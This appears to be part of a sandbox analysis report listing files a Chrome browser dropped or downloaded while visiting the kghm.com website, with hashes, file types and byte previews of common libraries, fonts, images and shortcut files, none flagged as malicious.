                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2689
                                          Entropy (8bit):3.997511086126167
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FF2D9810ED6A0C416C72C4A9FCC0FAAF
                                          SHA1:03CF9757A06AD8DE946721AA23F2994D80150281
                                          SHA-256:BA9E2C9EE8286E39FDEB7B81BBA3FAFF3373DD03F1C66103F4FF7B91FD1891F6
                                          SHA-512:87D618F4BCC72BD4EAF6E8C9316E69979EA54D067B33A2FF3E5B51F5BBD3EF21CB6739812F65B35321A6B436A1B1B7F9A86A10082ED637B00A054CEA2A84D90A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 09:00:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9818541781853587
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5C17D0642606109928852651DB7038F7
                                          SHA1:EE666216900DAB741AAF244693AE985043E7B192
                                          SHA-256:48B1777E0A50F2E40CC03052013E4B9E275C583902EC0287DA021512CC96CD2C
                                          SHA-512:3E114398AFD2FE7870F2EB661145C0F59D8A05D5DFFA9C69E7EF286A8A5602889B3C3B4F59E981C956C13EADDFF9657013173BF237D4EAE858BB13DE78809123
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....rP.D )..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 09:00:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9725110484029074
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FCAE0F3F12DEFF4CACE2BDCF8DAE4899
                                          SHA1:00C0BF36AF0EB79889153B3CF6C101DCC10E365F
                                          SHA-256:ACAA423A1E5ED929781294F2690B76C34CF7FFF96E99DBE43EDC602835F12B51
                                          SHA-512:F34853983FFE1E6C7C032F65E1C5B1F35838E344C67E806DA59446328A59B36F3DC91EFA5844FF21C9588FB067FD7774B016AF1414B7262F508AEBA4E8862F98
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....M7.D )..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 09:00:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):3.9834401623857607
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3F300CA8C2B8206772216555F0A3795F
                                          SHA1:05049DC85D8CEDFD657D43F82404A8EBF06E71EB
                                          SHA-256:018F2FE73AD2258F1C395E4A0F91CC0EA39FF50EBF8D19BCB5A934B503CA702F
                                          SHA-512:253C2D5CBFD66E84CF3FD4BC1914A1B8B2465B7BC0627391B3E4F5717B7BE12058B7CD876B66F9A0AA759C3FE1AD122D990D40694B0748A07B501F16BD8E87F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....{(.D )..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32012)
                                          Category:downloaded
                                          Size (bytes):69597
                                          Entropy (8bit):5.369216080582935
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1000x627, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:downloaded
                                          Size (bytes):93372
                                          Entropy (8bit):7.998210809017399
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:E14CAA27E4E579A2A03BCCFC16AA2258
                                          SHA1:D02171EB72EC427BD17AB55E866D1C5F4B474E8E
                                          SHA-256:1065248E0514FB6FD211D617502F25B5569ABB38C8C4BC06A6922BF660D8E417
                                          SHA-512:E2DF41828B03C1DDEE9890A24F5A56E524B5A27D52AAD28CF97F29D5C1A33899C75794E186127DED85E6608781C300368DD77BF3BBE7CC2813F3031F914322F8
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/original_image/public/2024-02/gornictwo_kghm.jpg.webp?itok=MZm7hsb_
                                          Preview:RIFF.l..WEBPVP8 .l..PF...*..s.>m0.G$".+..l.p..dl.....E%..mk.......8.f....=f..p...x...........K...u..8..r......../?...........&................../..?......................y..{......;..../.~............S.....^..............s...?.>._.?..`?........]......._;|:...N.}......^.Y....<.....'..|..OB..?.z0.g. ..9..L.l.......2._...G......8.........K.o.....[..e.......9p..$.A...K..v._..........tq."o^.#..kc.)8M...g...J.>.*....t..m.y}..q.....f..URj.p..j......s.2.N.....r;.....x...%.W.E..........cP&....k.K.........w.X.PjT.,k........7O:.)...?h>>...]/.;... ?...mVK._...n.\.........9&..).:..^0.;~..3.r...;,=.e..*..x.&B..........Ar..-..?.-....(....\../..gsE.@b..]<<6P.]....<#.2......GU&......T....!.i..=...:t/.\/&.../..!.;.0..VQ...r'.^...../..'.GA@}........X...qM>Z.b........f...!O.<f...f....}h...c.g.>.....4.............9[E..a...U.....rY..L,.a.....0.a...ND.A.9} ..L..c!k.{a....O..`8..r.6.$......O.u.xnx)w.D...k".}~...H,..$..]c.^.g..j....x8..e;.d`.M.@{nk.=.......*[c-7.ra.._._
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 7 x 7, 1-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):105
                                          Entropy (8bit):4.796583392591733
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:683B41A3F451431D1A7BCE65B3AEC04C
                                          SHA1:F1721BC502FE579A6069898A2EA0E6E004E351B7
                                          SHA-256:BF38E36E83C03851EF6AD378A251217256A9A42547BEEA0D57FCBB8031241034
                                          SHA-512:5A91A6EBD7B479942B1B159C13DAF7DBD832ED7DA1F79F4A2DA72CC129B52A215D8F4ED558EBC99202D5CA34B8BFC51E983749101D236B31371E7EA676EF0ABB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/contrib/classy/images/misc/menu-collapsed.png
                                          Preview:.PNG........IHDR....................PLTE......U..~....tRNS.@..f....IDAT..cV`.@)f.f...|.........IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x1080, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:dropped
                                          Size (bytes):412036
                                          Entropy (8bit):7.999586774824976
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:7F9B3E5F7F3B61D88B6AF7F16E8AADBF
                                          SHA1:587DAB42FE74066BD1F833BEA52A03FA00B1A559
                                          SHA-256:680CC3E4D384A1257D906A59B0563B2B2A0A77FDDC4CB2897564CEFADDCE6F39
                                          SHA-512:FED990CFC893ED6576ABCE81CAAB9EB3172E886B543F55ADD32B6B98F08BADBDE020CF253A99DF110B70806881B085605A082E4A23403CB8A5DA6F3CE9BA7DD8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFF|I..WEBPVP8 pI...(...*..8.>m0.G$#!.)t....il`tI{V.....tL..<.Y..........?..."...E.1.....O.W...y.r.(..:..u._..+]......}....C./.G.........._N..^..b..yl.7.._.=F..~.t.Q..="./.^....o...<..S.K.....]......oP...E...Oq?[~&..............G.....~{.g..._....../....J.k.o..........{I........O...=d..................5.......>......................~.....p|.ABJe.....&....;.8y>n.../@..^A.......2.9.0..E.$..Lt....j..Tm..]].....gy....$.X...../...n.B%Ml..=e<../\^|..$..].....M.............g.S.^.j.f......G?J...G4.A..=.<r...gQ.v.O}k.%k.t....$?Zf0..0.]3I.c...z.. ..6&..+.../.4...6...w5K.B..=. ...g....j.D.a.f..T...R......W.L.D;.u.....Jg..{m...#...@B5.r`..i..........Q..*...(i.mj..S...+%..w9sB.l..._3. .......5...07....z#.`..zN..w~...//.lQBb....t.......cw.'`h....:.....R.>.x..B.h.>.49...Yc.q ..n..}.+.?.b.]..o.A...69A..A<.]...6..e.\_Q...7...#S.V=..eG.{.i{..S...}..1.<m.............e...9}..;...K.u.b.b ..$.V...a..K...J.mF.$m.i..E.9I..3~...P..%x...&r.!...C.{.....X..@5...m.l.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (30837)
                                          Category:downloaded
                                          Size (bytes):31000
                                          Entropy (8bit):4.746143404849733
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:269550530CC127B6AA5A35925A7DE6CE
                                          SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                          SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                          SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
                                          Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (1122)
                                          Category:downloaded
                                          Size (bytes):1129
                                          Entropy (8bit):5.183798065980027
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D4FD2A995B78AF7DDAC461777051A780
                                          SHA1:A8B9C7EEE18D3581BD63BB994516AD951256C277
                                          SHA-256:DA274B94142421269A893F7B3EF5D285DB3238009166F005D208673067C9E1FC
                                          SHA-512:A49D56432B1B1391D151C91757EA5FB043AFB5E119E065B1A3EA8597FCF637F00B36B666AE49C893BF06C57BE460F9004520638D8E53471A38F6FF0382180D52
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/js/zip-basket-IPNTe-3i.js?sm23fd
                                          Preview:((e,p)=>{p.behaviors.zipBasket={attach(){e(".zipbasket-link").each((t,r)=>{const s=r.attributes.href.value.replace("http://kghm.com","");e(r).prev().is("input")||e(r).before(`<input type="checkbox" id="zipbasket${t}" name="zipbasket" value="${s}"> `)}),e(".zipbasket-create").unbind().click(()=>{e(".zipbasket-error").remove(),e("#error-msg").remove();const t=[],r="/kghm-zip-basket/download";if(e('input[name="zipbasket"]:checked').each((a,i)=>{t.push(i.value)}),t.length===0){const a=drupalSettings.path.currentLanguage==="pl"?"Prosz. wybra. plik/pliki do pobrania.":"You must select at least one file.";e(".zipbasket-create").after(`<p id='error-msg' class='text-danger'>${a}</p>`);return}e(".zipbasket-create").append('<img src="/themes/custom/kghm/images/throbber.gif" class="zipbasket-loading" />'),e.post(r,{file_paths:t}).done(a=>{if(e("img").remove(".zipbasket-loading"),a.status===201)window.open(a.filePath,"_self");else{const o=`<p class="text-danger zipbasket-error">${drupalSettings.p
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 7 x 7, 1-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):106
                                          Entropy (8bit):4.8023599768747625
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D2D5438D897DCF8BD12FD05A98BD627D
                                          SHA1:FABFC0B53580F77C542D5AF6CCFC22562E4CDBAF
                                          SHA-256:71044970E802B0CF12FF5CB2E20A5910192E473A2968385F99C2987D3A4D0231
                                          SHA-512:B33CA172E976E4B5312484B518C60A1280B133CED6925169BA6E45DCAB958AE9A8BCD4681C4EA53B2A43E81D2FFD49C0D42203447AE0ED60A1042EC81F8D2CC6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/contrib/classy/images/misc/menu-expanded.png
                                          Preview:.PNG........IHDR....................PLTE......U..~....tRNS.@..f....IDATx.c..P.`. ................IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (19015)
                                          Category:downloaded
                                          Size (bytes):19188
                                          Entropy (8bit):5.212814407014048
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (3152), with no line terminators
                                          Category:dropped
                                          Size (bytes):3152
                                          Entropy (8bit):5.183336989890146
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0C8F7FBE33CEAF5EC18B170F4654AC35
                                          SHA1:F0C975479970A22C7076EE15506F3F9680F0F925
                                          SHA-256:FA2C31F1139ECDB4A5EE194DF5B10F4844435639CDF791BEBAE6C49EE5B05089
                                          SHA-512:A20A071C117AC1D6A1BDB9EC9F59BAB9FE38980C2803D1FB48B4076FA43D13C36346DA99BEE7FF15C5A96DEB019920B28FD67FAC6E520434195DDABCEA79D1C9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:!function(o,i){function r(){}var n,d,e,l,t,a,s,c,u,f,p,m,y,v,h,_,g=".m4v434v2",k=o.head;"function"==typeof[].indexOf&&k&&(i.a2a=i.a2a||{},n=i.a2a_config=i.a2a_config||{},_=(d=o.currentScript instanceof HTMLScriptElement?o.currentScript:null)&&d.src?d.src:"",e=d&&!d.async&&!d.defer,NodeList&&NodeList.prototype.forEach&&(i.a2a.init=function(e,a){void 0===a&&(a=n);var t=":not([data-a2a-url]):not(.a2a_target)";o.querySelectorAll(".a2a_dd"+t+",.a2a_kit"+t).forEach(function(e){e.matches(".a2a_kit .a2a_dd");e.a2a_index||null!==e.getAttribute("data-a2a-url")||e.matches(".a2a_kit .a2a_dd")||(e.dataset.a2aUrl=a.linkurl||"",a.linkname&&(e.dataset.a2aTitle=a.linkname))}),delete n.linkurl,delete n.linkname},i.a2a_init=i.a2a.init,e)&&i.a2a.init("page",{linkurl:n.linkurl,linkname:n.linkname}),i.a2a.page||(i.a2a.page=!0,l=[],["init_all","svg_css"].forEach(function(t){i.a2a[t]=function(){for(var e=[],a=0;a<arguments.length;a++)e[a]=arguments[a];l.push([t,e])}}),a=(t=n.static_server)?t+"/":"https://stat
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (624)
                                          Category:downloaded
                                          Size (bytes):716
                                          Entropy (8bit):5.2368725597776615
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:41B7ED0CBE240173EEA85148FCBA633E
                                          SHA1:39ACD5FE099974486A1C9BA11BA0FE7BE6BC97CA
                                          SHA-256:274D4116239B63097BB7C16E56E27CBB5A77BE20392FB8E2317C0A0235185CAD
                                          SHA-512:1EE1D21B138A9F55F823B93D809B3BC58453DDFC3B3EE4D00A1010BBD4EC296546277C6777819CFB744C393BA93FE7578B60CCF0259FD17901F4542714D6C06F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://static.addtoany.com/menu/sm.25.html
                                          Preview:<!doctype html><html><head><title>A2A</title><meta name="robots" content="noindex"><script>.!function(e){var o=document.cookie,t=0<o.length;var n,a={feed:[],page:[]};t&&["feed","page"].forEach(function(e){var t=e+"_services",n=o.indexOf(t+"=");-1!=n&&(-1==(t=o.indexOf(";",n=n+t.length+1))&&(t=o.length),n=decodeURIComponent(o.substring(n,t)),a[e]=n.split(","))}),n={a2a:!0,h1:(t=!1,"function"==typeof performance.getEntriesByType&&(n=(n=performance.getEntriesByType("navigation")[0])&&n.nextHopProtocol?n.nextHopProtocol:"",t=/^http\/1/.test(n)),t),user_services:{feed:a.feed,page:a.page}},e.postMessage&&e.parent.postMessage(n,"*")}(window);</script></head><body style="background-color:transparent"></body></html>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 28 names, Macintosh, Copyright 2011 The Montserrat Project Authors (https://github.com/JulietaUla/Montserrat)Montserr
                                          Category:downloaded
                                          Size (bytes):260236
                                          Entropy (8bit):6.177139279308374
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A98626E1AEF6CEBA5DFC1EE7112E235A
                                          SHA1:CA42FE10FA893F390472859405C7564095E4260F
                                          SHA-256:92B3D3C6E135EB1DC95F88E6CA75BD6113D9EB3261A95CA39F733E3897E53675
                                          SHA-512:81761CD87AECE3CEA03B4520D8C7518F8D549D8E91CCE2A4A4752729E7A28AD4B502472731A06F7051F357BFA1042640A5E7592887B1C3914DE0DFE230EF882C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/Montserrat-Medium-DUBscxQc.ttf
                                          Preview:........... DSIG............GDEF.6.b...,....GPOS.$........4VGSUBx0m...8...=<OS/2V..N..uP...`cmap......u....(cvt 0......X....fpgmM$.|...<...mgasp.......P....glyf..........head.P.x..]`...6hhea...I..]....$hmtx...g..]....\loca.^...|....0maxp...W...H... name.......h....post.B.......WJprep.K.....................V...a...H...J.....................................................0.:...<.U...W.Y...[...............................B...D.K...N.s...u...................-.../.@...B.g...i.................................................7...9.;...=.p...s.s...u.w...z............................................................................................................................................................./...1.2...4.5...7.7...9.:...<.B...H.H...J.J...L.N...P.T...W.[...]._...a.d...f.f...h.h...j.r...t........................................................................._...{...........................!.$...&.'...,.F...J.K...M.]...{.|...............&....DFLT..cyrl.$latn.j..............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1169 x 318, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):417689
                                          Entropy (8bit):7.994211121722773
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:8E70D4E3035254E4B01A13D7F9AE424B
                                          SHA1:4DA0AC18F524F9C4DFC5090D35AE7710F61EF09C
                                          SHA-256:EE8DA8E780960A546AC00E193D99F49985D17719E05D607C2D96F9C2346FC7CE
                                          SHA-512:D6DD538CDA17142E86622FB5176777504BB4CB9C6AB3AE25E7DDD18A742A96E4F8CA0855D8AB02E37A27D07B60FCCEBEEB13FC6AE346909F1958FB076BEC9952
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/stock-exchange-bg-J850pA-6.png
                                          Preview:.PNG........IHDR.......>......^.y....sRGB...,..._SIDATx......'. .si.4eU%W..[...VK....9g.....vgW]..*.K.L.`.....2..E.J..dd.....5..o..p..#.../........[x?....p....h.P.\ePD..=1.....iT..5....f.........m..`_.'c...*....(....... .......m3.Q6.Mb...g.oG.5.M{........[.}.3...Q....K0......%.%..=..4..o.GAE.7.Q]n.s.A......E*M.4KGi..E.d./..G..I.)......H.ORHn....7L@{..m*J..6UYj"rx..........^....X...E!*..$.K..8.O.........?.....<:|zx......V.I6...(Q*.&..8?z.../..U-OM.*...1%TC....jQqm9..Q./.B...s....>..4.a_..C%...f..uB.+......G...l..w...!|G....j.8Q....f.....J.d.e..r...UY.....4=.g..lk{kkk6.O......h2.J9_..W.Ji..*.@....qFd.X......"o...y..LHW......)..J...,t..BKC..1.o...F..D(u.M.=@.Clg.4.......N.....id.Q2.....H.%..h<.....k.#....E0..Hb.E............[a....M .uh=.oj....h...K.U.......s....b.tAw.U..~.9/.w.K`R.a`V.-.@..q .}]......Ly.+.....&N%.....t..C.2.].\{.}f......$...V.G|]1..$..g.....?..j..\..O.|...{.E.).L(..2...s...3<.......H{u.0.$..%.........S..F...\3.'.r...z}.q.8.N.t.a
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text
                                          Category:downloaded
                                          Size (bytes):23427
                                          Entropy (8bit):5.112735417225198
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BA0537E9574725096AF97C27D7E54F76
                                          SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                          SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
